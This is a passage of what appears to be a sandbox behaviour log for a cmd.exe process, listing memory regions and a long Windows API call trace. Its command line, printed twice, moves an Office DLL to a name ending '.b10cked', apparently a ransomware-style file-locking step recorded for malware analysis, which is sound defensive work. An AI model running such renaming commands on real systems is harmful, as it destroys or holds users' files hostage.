"c:\\windows\\system32\\apisetschema.dll") Region: id = 22776 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22777 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22778 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22983 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22984 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id 
= 22985 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22986 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 22987 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 22988 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22989 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22990 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22991 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22992 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22993 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22994 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22995 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22996 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22997 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22998 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22999 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23000 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23001 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 23002 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 23003 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 23004 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 23005 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename 
= "" Region: id = 23006 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 354 os_tid = 0x8cc [0169.515] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af78c | out: lpSystemTimeAsFileTime=0x2af78c*(dwLowDateTime=0x9c1fee40, dwHighDateTime=0x1d440a9)) [0169.516] GetCurrentProcessId () returned 0x748 [0169.516] GetCurrentThreadId () returned 0x8cc [0169.516] GetTickCount () returned 0x3206b [0169.516] QueryPerformanceCounter (in: lpPerformanceCount=0x2af784 | out: lpPerformanceCount=0x2af784*=22630488450) returned 1 [0169.517] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0169.517] __set_app_type (_Type=0x1) [0169.517] __p__fmode () returned 0x76b331f4 [0169.517] __p__commode () returned 0x76b331fc [0169.517] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0169.517] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0169.518] GetCurrentThreadId () returned 0x8cc [0169.518] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8cc) returned 0x38 [0169.518] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0169.518] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0169.518] SetThreadUILanguage (LangId=0x0) returned 0x409 [0169.518] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0169.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af71c | out: phkResult=0x2af71c*=0x0) returned 0x2 [0169.518] VirtualQuery (in: lpAddress=0x2af753, lpBuffer=0x2af6ec, dwLength=0x1c | out: lpBuffer=0x2af6ec*(BaseAddress=0x2af000, AllocationBase=0x1b0000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.519] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af6ec, dwLength=0x1c | out: lpBuffer=0x2af6ec*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0169.519] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af6ec, dwLength=0x1c | out: lpBuffer=0x2af6ec*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0169.519] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af6ec, dwLength=0x1c | out: lpBuffer=0x2af6ec*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.519] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af6ec, dwLength=0x1c | out: lpBuffer=0x2af6ec*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0169.519] GetConsoleOutputCP () returned 0x1b5 [0169.519] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0169.519] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0169.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0169.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.520] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0169.520] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.520] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0169.520] _get_osfhandle (_FileHandle=0) returned 0x3 [0169.520] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0169.520] _get_osfhandle (_FileHandle=0) returned 0x3 [0169.520] SetConsoleMode 
(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0169.521] GetEnvironmentStringsW () returned 0x3d0210* [0169.521] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0169.521] GetEnvironmentStringsW () returned 0x3d0210* [0169.521] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0169.521] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae68c | out: phkResult=0x2ae68c*=0x40) returned 0x0 [0169.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0xa0, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.522] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x1, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.522] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0x1, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.522] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x0, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x40, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x40, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0x40, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.524] RegCloseKey (hKey=0x40) returned 0x0 [0169.524] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae68c | out: phkResult=0x2ae68c*=0x40) returned 0x0 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0x40, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x1, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0x1, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x0, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.525] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x9, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.525] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x9, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.525] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, 
lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0x9, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.525] RegCloseKey (hKey=0x40) returned 0x0 [0169.525] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886387 [0169.525] srand (_Seed=0x5b886387) [0169.525] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked\"" [0169.525] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked\"" [0169.525] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0169.526] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0169.526] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0169.526] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0169.526] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0169.526] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0169.526] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0169.526] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0169.526] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0169.526] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0169.526] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0169.526] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0169.526] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0169.526] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0169.527] GetEnvironmentStringsW () returned 0x3d2360* [0169.527] FreeEnvironmentStringsW (penv=0x3d2360) returned 1 [0169.527] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0169.527] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0169.527] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0169.527] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0169.527] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0169.527] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0169.527] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0169.527] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0169.527] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0169.527] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0169.527] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af458 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0169.527] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af458, lpFilePart=0x2af454 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af454*="Desktop") returned 0x18 [0169.528] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0169.528] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af1d4 | out: lpFindFileData=0x2af1d4) returned 0x3d09f0 [0169.528] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0169.529] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af1d4 | out: lpFindFileData=0x2af1d4) returned 0x3d09f0 [0169.529] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0169.529] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af1d4 | out: lpFindFileData=0x2af1d4) returned 0x3d09f0 [0169.529] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0169.529] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0169.529] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0169.529] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0169.529] GetEnvironmentStringsW () returned 0x3d0210* [0169.530] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0169.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0169.530] GetConsoleOutputCP () returned 0x1b5 [0169.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0169.612] GetUserDefaultLCID () returned 0x409 [0169.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0169.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af598, cchData=128 | out: lpLCData="0") returned 2 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af598, cchData=128 | out: lpLCData="0") returned 2 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af598, cchData=128 | out: lpLCData="1") returned 2 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0169.613] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0169.613] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0169.614] GetConsoleTitleW (in: lpConsoleTitle=0x3c0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0169.614] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0169.614] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0169.614] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0169.615] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0169.615] _wcsicmp (_String1="move", _String2=")") returned 68 [0169.615] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0169.615] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0169.616] _wcsicmp (_String1="IF", _String2="move") returned -4 [0169.616] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0169.616] _wcsicmp (_String1="REM", _String2="move") returned 5 [0169.616] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0169.620] GetConsoleTitleW (in: lpConsoleTitle=0x2af290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0169.620] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0169.620] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0169.620] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0169.620] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0169.620] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0169.620] _wcsicmp (_String1="move", _String2="CD") returned 10 [0169.620] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0169.620] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0169.620] _wcsicmp (_String1="move", _String2="REN") returned -5 [0169.620] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0169.620] _wcsicmp (_String1="move", _String2="SET") returned -6 [0169.621] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0169.621] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0169.621] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0169.621] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0169.621] _wcsicmp (_String1="move", _String2="MD") returned 11 [0169.621] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0169.621] _wcsicmp (_String1="move", _String2="RD") returned -5 [0169.621] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0169.621] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0169.621] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0169.621] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0169.621] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0169.621] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0169.621] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0169.621] _wcsicmp (_String1="move", _String2="VER") returned -9 [0169.621] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0169.621] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0169.621] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0169.621] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0169.621] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0169.621] _wcsicmp (_String1="move", _String2="START") returned -6 [0169.621] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0169.621] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0169.621] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0169.623] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0169.623] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0169.623] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af04c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af044, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af044*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0169.623] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0169.623] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0169.623] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0169.624] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", 